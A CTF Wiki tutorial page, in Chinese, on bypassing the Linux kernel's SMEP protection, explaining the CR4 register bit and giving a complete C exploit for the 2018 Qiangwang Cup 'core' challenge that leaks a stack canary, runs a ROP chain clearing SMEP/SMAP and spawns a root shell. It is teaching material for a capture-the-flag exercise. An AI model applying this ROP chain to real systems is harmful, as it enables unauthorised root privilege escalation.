CTF Wiki
  • 简介
  • 如何使用 CTF Wiki
  • introduction
    • CTF 历史
    • CTF 竞赛模式简介
    • CTF 竞赛内容
    • 线下攻防经验小结
    • CGC 超级挑战赛
    • 学习资源
  • misc
    • 杂项简介
    • 取证隐写前置技术
    • 信息搜集技术
    • encode
      • 通信领域常用编码
      • 计算机相关的编码
      • 现实世界中常用的编码
    • picture
      • 图片分析简介
      • JPG
      • PNG
      • GIF
    • audio
      • 音频隐写
    • archive
      • RAR 格式
      • ZIP 格式
    • traffic
      • 流量包分析简介
      • 协议分析概述
        • Wireshark
        • DNS
        • HTTP
        • HTTPS
        • FTP
        • USB
        • WIFI
      • 数据提取
      • PCAP 文件修复
    • disk-memory
      • 磁盘内存分析
      • 题目
    • shellcode
    • other
      • pyc
  • web
    • Web 简介
    • XSS
    • php
      • PHP 代码审计
    • SQL 注入
      • sqlmap绕过脚本
      • 各版本数据库语句备忘
    • CSRF
    • SSRF
  • reverse
    • 软件逆向工程简介
    • identify-encode-encryption
      • 常见加密算法和编码识别
    • language
      • 简介
      • go
        • Golang 逆向入门
      • python
        • Python 逆向入门
      • rust
        • Rust 逆向入门
    • maze
      • 迷宫问题
    • obfuscate
      • 控制流平坦化
      • 花指令
      • movofuscator
      • Self-Modified Code
    • vm
      • 虚拟机分析
    • platform
      • linux
        • Detecting Breakpoints
        • Detecting debugging
        • False Disassembly
        • LD_PRELOAD
      • windows
        • anti-debug
          • CheckRemoteDebuggerPresent
          • 反调试技术例题
          • Heap Flags
          • Interrupt 3
          • IsDebuggerPresent
          • 花指令
          • NtGlobalFlag
          • NtQueryInformationProcess
          • The Heap
          • Thread Local Storage(TLS)
          • ZwSetInformationThread
        • unpack
          • 一步到达 OEP 法
          • ESP 定律法
          • DUMP 及 IAT 重建
          • 最后一次异常法
          • 手动查找 IAT 并使用 ImportREC 重建
          • 内存镜像法
          • 保护壳简介
          • SFX 法
          • 单步跟踪法
          • DLL 文件脱壳
    • tools
      • constraint
        • z3
      • debug
        • gdb
        • ollydbg
        • windbg
        • x64dbg/x32dbg
      • simulate-execution
        • angr
        • Unicorn Engine
      • static-analyze
        • dnspy
        • Ghidra
        • IDA Pro
        • jadx
  • crypto
    • 密码学简介
    • asymmetric
      • 介绍
      • discrete-log
        • 离散对数
        • ECC
        • ElGamal
      • knapsack
        • 背包加密
      • lattice
        • CVP
        • 基本介绍
        • 格基规约算法
        • 格概述
      • rsa
        • RSA 选择明密文攻击
        • RSA 复杂题目
        • Coppersmith 相关攻击
        • 公钥指数相关攻击
        • 模数相关攻击
        • Bleichenbacher's attack
        • RSA 侧信道攻击
        • RSA 介绍
        • d_attacks
          • 私钥 d 相关攻击
          • 扩展维纳攻击
    • attack-summary
      • 简介
      • 比特攻击
      • 中间相遇攻击 - MITM
    • basic
      • 基础数学知识
    • blockcipher
      • AES
      • ARX: Add-Rotate-Xor
      • DES
      • IDEA
      • 块加密
      • Simon and Speck Block Ciphers
      • mode
        • CBC
        • CFB
        • CTR
        • ECB
        • 分组模式
        • OFB
        • Padding Oracle Attack
        • 填充方式
        • PCBC
    • certificate
      • 证书格式
    • classical
      • 古典密码简介
      • 单表代换加密
      • 其它类型加密
      • 多表代换加密
      • 总结
    • hash
      • Hash Attack
      • 综合题目
      • Fowler–Noll–Vo hash function
      • 哈希函数
      • MD5
      • SHA1
    • signature
      • DSA
      • ElGamal
      • 数字签名
      • RSA 数字签名
    • streamcipher
      • 流密码
      • fsr
        • 反馈移位寄存器
        • 线性反馈移位寄存器 - LFSR
        • 非线性反馈移位寄存器
      • lcg
        • 题目
        • 线性同余生成器
      • prng
        • 密码安全伪随机数生成器
        • 伪随机数生成器介绍
        • 题目
      • special
        • RC4
  • pwn
    • MacOS
    • misc-os
    • 概述
      • stackoverflow
        • 执行 Shellcode
        • 栈介绍
        • 栈溢出原理
    • browser
      • Chrome
      • Firefox
      • Safari
    • hardware
      • 简介
        • side-channel
          • prefetch side-channel attack
      • trusted-computing
        • 可信执行环境
    • linux
      • kernel-mode
        • 基础知识
        • Introduction
          • DoS
          • Information Disclosure
          • Introduction
            • Change Others
            • Change Self
        • Introduction
          • Introduction
            • 信息泄漏
            • Misc
          • Introduction
            • Kernel Stack Canary
          • Introduction
            • inner-kernel
              • 内部隔离
            • Introduction
              • KPTI - Kernel Page Table Isolation
              • 用户代码不可执行
              • 用户数据不可访问
          • Introduction
            • FGKASLR
            • KASLR
        • Introduction
          • 编译内核驱动
          • 内核下载与编译
          • Qemu 模拟环境
          • Real Device
        • exploitation
          • heap
            • 内核堆概述
            • buddy
              • Cross-Cache Overflow & Page-level Heap Fengshui
              • Page-level UAF
            • slub
              • freelist 劫持
              • Heap Spray
              • kernel UAF
          • race
            • Double Fetch
            • userfaultfd 的使用
          • rop
            • bypass-smep
            • ret2dir
            • 利用 pt_regs 构造通用内核 ROP
            • ret2usr(已过时)
            • Kernel ROP
          • tricks
            • 在内存中直接搜索 flag
      • user-mode
        • environment
        • fmtstr
          • 检测
          • 例子
          • 利用
          • 原理介绍
        • integeroverflow
          • 整数溢出
        • io-file
          • glibc 2.24下 IO_FILE 的利用
          • 伪造vtable劫持程序流程
          • FSOP
          • FILE结构
        • mitigation
          • Canary
        • race-condition
          • introduction
          • 题目
        • summary
          • 获取地址
          • shell 获取小结
          • 控制程序执行流
        • Type Confusion
        • Uninitialized Memory
        • heap
          • mallocng
          • ptmalloc2
            • Chunk Extend and Overlapping
            • Fastbin Attack
            • 堆概述
            • 堆相关数据结构
            • 堆溢出
            • House Of Einherjar
            • House Of Force
            • House of Lore
            • House of Orange
            • House of Pig
            • House of Rabbit
            • House of Roman
            • 堆利用
            • Large Bin Attack
            • 通过堆进行信息泄漏
            • 堆中的 Off-By-One
            • 堆中的检查
            • tcache makes heap exploitation easy again
            • Unlink
            • Unsorted Bin Attack
            • Use After Free
            • implementation
              • 基础操作
              • 释放内存块
              • 堆初始化
              • malloc_state 相关函数
              • 申请内存块
              • 测试支持
              • 深入理解堆的实现
              • tcache
        • stackoverflow
          • arm
            • 环境搭建
            • Arm ROP
          • mips
            • mips - ROP
          • RISC-V
          • x86
            • 基本 ROP
            • 花式栈溢出技巧
            • 中级ROP
            • 栈介绍
            • 栈溢出原理
            • advanced-rop
              • 高级 ROP
              • ret2dlresolve
              • ret2VDSO
              • SROP
    • sandbox
      • Chroot
      • Docker
      • Namespace
      • python
        • Python 沙盒
      • seccomp
        • C 沙盒逃逸
      • Shell Sandbox
    • virtualization
      • basic-knowledge
        • 虚拟化技术简介
        • CPU 虚拟化
        • IO 虚拟化
        • 内存虚拟化
      • parallels
        • Parallels
      • VirtualBox
      • VMWare
      • qemu
        • basic-knowledge
          • QEMU 设备模拟
          • QEMU 内存管理
        • environment
          • 编写 QEMU 模拟设备
          • QEMU 下载与编译
        • exploitation
          • QEMU 逃逸入门
          • 越界读写
  • Android 安全
    • basic_develop
      • Android 开发基础
    • Android 应用运行机制简述
      • Android 中 Java 层的运行机制
        • dex
          • DEX文件
          • ODEX文件
        • smali
          • Smali
      • native_layer
        • so 介绍
    • basic_reverse
      • Android 关键代码定位
      • Android 逆向基本介绍
      • dynamic
        • Android 动态调试
        • IDA 动态调试原生层程序
        • IDA 动态调试 smali 代码
      • static
        • 静态分析综合题目
        • 静态分析 java 层例子
        • 静态分析原生层程序
  • blockchain
    • Blockchain Security Challenges
    • Blockchain Security Overview
    • ethereum
      • Ethereum Basics
      • Ethereum Overview
      • Ethereum Opcodes
      • 学习资源
      • Smart Contract Reverse
      • Function Selector and Argument Encoding
      • Ethereum Storage
      • attacks
        • Airdrop Hunting
        • Arbitrary Writing
        • CREATE2
        • Delegatecall
        • Introduction
        • Jump Oriented Programming
        • Integer Overflow and Underflow
        • Randomness
        • Re-Entrancy
        • Short Address Attack
        • Uninitialized Storage Pointer
    • publicblockchain
      • Public Blockchain Security Overview
      • Blockchain Weaknesses
  • assembly
    • ARM
    • MIPS
    • x86_x64
  • executable
    • elf
      • 程序加载
      • 程序执行流程
      • linking
        • 程序链接
        • Symbol Reslove
      • structure
        • ELF 文件
        • Code Section
        • Data Related Sections
        • Dynamic Sections
        • Misc Sections
        • Sections
        • String Sections
        • .symtab: Symbol Table
    • pe
      • PE 文件格式
      • 导出表
      • 导入表
      • 基址重定位表
  • ics
    • ICS_CTF 竞赛
    • ICS_CTF 发现
    • ICS_CTF 利用
    • ICS_CTF 学习资源
  • contribute
    • 贡献之前
    • 基本贡献方式
    • 贡献文档要求
    • 翻译
  • write up
    • 浙江工业大学CTF赛事
      • 2023第四届“安恒杯”CTF新生赛题解
Powered by GitBook
On this page
  • SMEP
  • smep 和 CR4 寄存器
  • 例题:强网杯2018 - core
  1. pwn
  2. linux
  3. kernel-mode
  4. exploitation
  5. rop

bypass-smep

PreviousropNextret2dir

Last updated 1 year ago

SMEP

为了防止 ret2usr 攻击,内核开发者提出了 smep 保护,smep 全称 Supervisor Mode Execution Protection,是内核的一种保护措施,作用是当 CPU 处于 ring0 模式时,执行 用户空间的代码 会触发页错误;这个保护在 arm 中被称为 PXN。

通过 qemu 启动内核时的选项可以判断是否开启了 smep 保护。

CISCN2017_babydriver [master●●] grep smep ./boot.sh
qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' -enable-kvm -monitor /dev/null -m 64M --nographic  -smp cores=1,threads=1 -cpu kvm64,+smep

也可以通过

CISCN2017_babydriver [master●●] grep smep /proc/cpuinfo 
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb invpcid_single pti tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid rdseed adx smap intel_pt xsaveopt dtherm ida arat pln pts
......

检测该保护是否开启。

smep 和 CR4 寄存器

系统根据 CR4 寄存器的值判断是否开启 smep 保护,当 CR4 寄存器的第 20 位是 1 时,保护开启;是 0 时,保护关闭。

例如,当

$CR4 = 0x1407f0 = 000 1 0100 0000 0111 1111 0000

时,smep 保护开启。而 CR4 寄存器是可以通过 mov 指令修改的,因此只需要

mov cr4, 0x1407e0
# 0x1407e0 = 101 0 0000 0011 1111 00000

即可关闭 smep 保护。

搜索一下从 vmlinux 中提取出的 gadget,很容易就能达到这个目的。

  • 如何查看 CR4 寄存器的值?

    • gdb 无法查看 cr4 寄存器的值,可以通过 kernel crash 时的信息查看。为了关闭 smep 保护,常用一个固定值 0x6f0,即 mov cr4, 0x6f0。

例题:强网杯2018 - core

这一次我们在启动脚本中添加上 smep 与 smap 的选项:

qemu-system-x86_64 \
-m 128M \
-cpu qemu64-v1,+smep,+smap \
-kernel ./bzImage \
-initrd  ./rootfs.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s  \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic  \

之后我们重新运行之前的 ret2usr 的 exp,发现直接 kernel panic 了,这是因为我们想要执行用户空间的函数指针,触发了 SMEP 保护

那么这里我们只需要通过 ROP 来关闭 SMEP&SMAP 即可继续 ret2usr,这里笔者用与运算将 SMEP 与 SMAP 的两位给清除掉了,实际上直接给 cr4 赋值 0x6f0 也是可以的(通常关了以后都是这个值)

前面我们使用 swapgs 和 iret 两条指令来返回用户态,这一次我们直接使用 swapgs_restore_regs_and_return_to_usermode 来返回用户态

最终的 exp 如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>

#define POP_RDI_RET 0xffffffff81000b2f
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RCX_RET 0xffffffff81021e53
#define POP_RAX_RET 0xffffffff810520cf
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define MOV_RAX_CR4_ADD_RSP_8_POP_RBP_RET 0xffffffff8106669c
#define AND_RAX_RDI_RET 0xffffffff8102b45b
#define MOV_CR4_RAX_PUSH_RCX_POPFQ_RET 0xffffffff81002515
#define PUSHFQ_POP_RBX_RET 0xffffffff81131da4
#define IRETQ 0xffffffff813eb448
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81a008da

size_t commit_creds = NULL, prepare_kernel_cred = NULL;

void * (*prepare_kernel_cred_ptr)(void *);
int (*commit_creds_ptr)(void *);

size_t user_cs, user_ss, user_rflags, user_sp;

void saveStatus()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

void getRootPrivilige(void)
{
    (*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

void getRootShell(void)
{   
    if(getuid())
    {
        printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
        exit(-1);
    }

    printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
    system("/bin/sh");
}

void coreRead(int fd, char * buf)
{
    ioctl(fd, 0x6677889B, buf);
}

void setOffValue(int fd, size_t off)
{
    ioctl(fd, 0x6677889C, off);
}

void coreCopyFunc(int fd, size_t nbytes)
{
    ioctl(fd, 0x6677889A, nbytes);
}

int main(int argc, char ** argv)
{
    printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n");
    saveStatus();

    int fd = open("/proc/core", 2);
    if(fd <0)
    {
        printf("\033[31m\033[1m[x] Failed to open the file: /proc/core !\033[0m\n");
        exit(-1);
    }

    //get the addr
    FILE* sym_table_fd = fopen("/tmp/kallsyms", "r");
    if(sym_table_fd < 0)
    {
        printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n");
        exit(-1);
    }
    char buf[0x50], type[0x10];
    size_t addr;
    while(fscanf(sym_table_fd, "%llx%s%s", &addr, type, buf))
    {
        if(prepare_kernel_cred && commit_creds)
            break;

        if(!commit_creds && !strcmp(buf, "commit_creds"))
        {
            commit_creds_ptr = commit_creds = addr;
            printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds);
            continue;
        }

        if(!strcmp(buf, "prepare_kernel_cred"))
        {
            prepare_kernel_cred_ptr = prepare_kernel_cred = addr;
            printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred);
            continue;
        }
    }

    size_t offset = commit_creds - 0xffffffff8109c8e0;

    // get the canary
    size_t canary;
    setOffValue(fd, 64);
    coreRead(fd, buf);
    canary = ((size_t *)buf)[0];

    //construct the ropchain
    size_t rop_chain[0x100], i = 0;
    for(; i < 10;i++)
        rop_chain[i] = canary;

    rop_chain[i++] = MOV_RAX_CR4_ADD_RSP_8_POP_RBP_RET + offset;
    rop_chain[i++] = *(size_t*) "arttnba3";
    rop_chain[i++] = *(size_t*) "arttnba3";
    rop_chain[i++] = POP_RDI_RET + offset;
    rop_chain[i++] = 0xffffffffffcfffff;
    rop_chain[i++] = AND_RAX_RDI_RET + offset;
    rop_chain[i++] = MOV_CR4_RAX_PUSH_RCX_POPFQ_RET + offset;
    rop_chain[i++] = (size_t)getRootPrivilige;
    rop_chain[i++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22 + offset;
    rop_chain[i++] = *(size_t*) "arttnba3";
    rop_chain[i++] = *(size_t*) "arttnba3";
    rop_chain[i++] = (size_t)getRootShell;
    rop_chain[i++] = user_cs;
    rop_chain[i++] = user_rflags;
    rop_chain[i++] = user_sp;
    rop_chain[i++] = user_ss;

    write(fd, rop_chain, 0x800);
    coreCopyFunc(fd, 0xffffffffffff0000 | (0x100));
}
smep
image.png